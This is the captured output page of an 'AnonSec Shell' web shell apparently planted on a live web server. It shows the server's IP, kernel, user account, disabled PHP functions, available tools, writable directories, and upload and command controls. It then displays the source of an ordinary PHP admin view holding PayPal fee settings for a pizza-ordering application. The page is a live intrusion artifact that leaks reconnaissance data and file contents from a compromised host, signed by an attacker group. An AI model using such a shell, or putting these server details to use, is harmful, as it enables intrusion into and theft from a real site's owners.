AnonSec Shell
Server IP : 162.214.74.102  /  Your IP : 216.73.216.139
Web Server : Apache
System : Linux dedi-4363141.lrsys.com.br 3.10.0-1160.119.1.el7.tuxcare.els25.x86_64 #1 SMP Wed Oct 1 17:37:27 UTC 2025 x86_64
User : lrsys ( 1015)
PHP Version : 5.6.40
Disable Function : exec,passthru,shell_exec,system
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/lrsys/public_html/lrsys_projetos/sopizzas/application/views/superadmin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/lrsys/public_html/lrsys_projetos/sopizzas/application/views/superadmin/payment_settings.php
<!-- Content Wrapper. Contains page content -->
      <div class="content-wrapper">
        <!-- Content Header (Page header) -->
          <section class="content-header content-header1">
            

            <h1><?php echo $this->lang->line('PaymentSettings');?></h1>
          </section>
        <!-- Main content -->
          <!-- tab section -->
              <div class="col-md-12 mctop15">
                <?php if($this->session->flashdata('success_msg')):?>
                        <div class="alert alert-info">
                            <a href="#" class="close" data-dismiss="alert" aria-label="close">&times;</a>
                            <strong><?php echo $this->session->flashdata('success_msg'); ?></strong> 
                          </div>
                        <?php endif; ?> 
                <div class="box-body">
                  <?php $validator = array('role' => 'form', 'data-toggle' => 'validator'); echo form_open('superadmin/paymentsettings', $validator); ?>
                    <div class="col-sm-6">
                      <div class="form-group float-label-control">
                        <p><?php echo $this->lang->line('PaypalFee');?></p>
                        <input name="paypal_fee" id="paypal_fee" type="text"  class="fs_input custom-full" value="<?php echo set_value('paypal_fee', isset($data['paypal_fee']) ? $data['paypal_fee'] : ''); ?>" placeholder="PayPal Fee(%)" required onkeypress="return isDecimal(event)"> <i class="fa fa-question-circle" data-toggle="tooltip" data-placement="left" title="<?php echo $this->lang->line('EnterPaypalFee');?>"></i> <span class="text-red">*</span>
                      </div>
                    </div>
                    <div class="col-sm-6">
                      <div class="form-group float-label-control">
                        <p><?php echo $this->lang->line('PaypalFeeDoller');?></p>
                        <input name="paypal_fee_fix" id="paypal_fee_fix" type="text"  class="fs_input custom-full" value="<?php echo set_value('paypal_fee_fix', isset($data['paypal_fee_fix']) ? $data['paypal_fee_fix'] : ''); ?>" placeholder="<?php echo $this->lang->line('PaypalFeeDoller');?>" required onkeypress="return isDecimal(event)"> <i class="fa fa-question-circle" data-toggle="tooltip" data-placement="left" title="<?php echo $this->lang->line('EnterPaypalFeeDoller');?>"></i> <span class="text-red">*</span>
                      </div>
                    </div>
                    <!-- <div class="form-group float-label-control">
                      <p>Paypal Payment <i class="fa fa-question-circle" data-toggle="tooltip" data-placement="left" title="Select any one mode"></i> <span class="text-red">*</span></p>
                      <?php
                        $livechecked = "";
                        $testchecked = "";
                        if(isset($data['paypal_mode']))
                        {
                          if($data['paypal_mode']=='Test')
                          {
                            $testchecked = 'checked';
                          }

                          if($data['paypal_mode']=='Live')
                          {
                            $livechecked = 'checked';
                          }

                        }
                       ?>

                      <label class="radio-inline"><input value="Live" type="radio" name="paypal_mode" class="minimal optradiopayment" data-attr="image" <?php echo $livechecked; ?>> Live Mode</label>
                      <label class="radio-inline"><input value="Test" type="radio" name="paypal_mode" class="minimal optradiopayment" data-attr="symbol" <?php echo $testchecked; ?>> Test Mode</label>
                    </div>
                    <div class="form-group">
                      <input name="paypal_url_test" id="paypal_url_test" type="text"  class="fs_input custom-full" value="<?php echo set_value('paypal_url_test', isset($data['paypal_url_test']) ? $data['paypal_url_test'] : ''); ?>" placeholder="PayPal URL Test" required> <i class="fa fa-question-circle" data-toggle="tooltip" data-placement="left" title="Enter paypal URL for test"></i> <span class="text-red">*</span>
                    </div>
                    <div class="form-group float-label-control">
                      <input name="business_test" id="business_test" type="text" value="<?php echo set_value('paypal_url_test', isset($data['paypal_url_test']) ? $data['paypal_url_test'] : ''); ?>" class="fs_input custom-full"  placeholder="Business Account Test" required>
                      <i class="fa fa-question-circle" data-toggle="tooltip" data-placement="left" title="Enter Business Account for Test"></i> <span class="text-red">*</span>
                    </div>

                    <div class="form-group">
                      <input name="paypal_url_live" id="paypal_url_live" type="text"  class="fs_input custom-full" value="<?php echo set_value('paypal_url_live', isset($data['paypal_url_live']) ? $data['paypal_url_live'] : ''); ?>" placeholder="PayPal URL Live" required> <i class="fa fa-question-circle" data-toggle="tooltip" data-placement="left" title="Enter paypal URL for Live"></i> <span class="text-red">*</span>
                    </div>
                    <div class="form-group float-label-control">
                      <input name="business_live" id="business_live" type="text" value="<?php echo set_value('business_live', isset($data['business_live']) ? $data['business_live'] : ''); ?>" class="fs_input custom-full"  placeholder="Business Account Live" required>
                      <i class="fa fa-question-circle" data-toggle="tooltip" data-placement="left" title="Enter Business Account for Live"></i> <span class="text-red">*</span>
                    </div> -->


                    <div class="col-md-12 text-left mtop15 padd0" style="display: inline-block;">
												<button style="margin-left: 20px;" type="submit" class="btn btn-info Custom-btn"><?php echo $this->lang->line('Submit');?></button>

											</div>
                  </form>
                </div>
              </div>
              <!-- ./tab section -->
          <div class="clearfix"></div>
      </div><!-- /.content-wrapper -->
    <div class="clearfix"></div>

Anon7 - 2022
AnonSec Team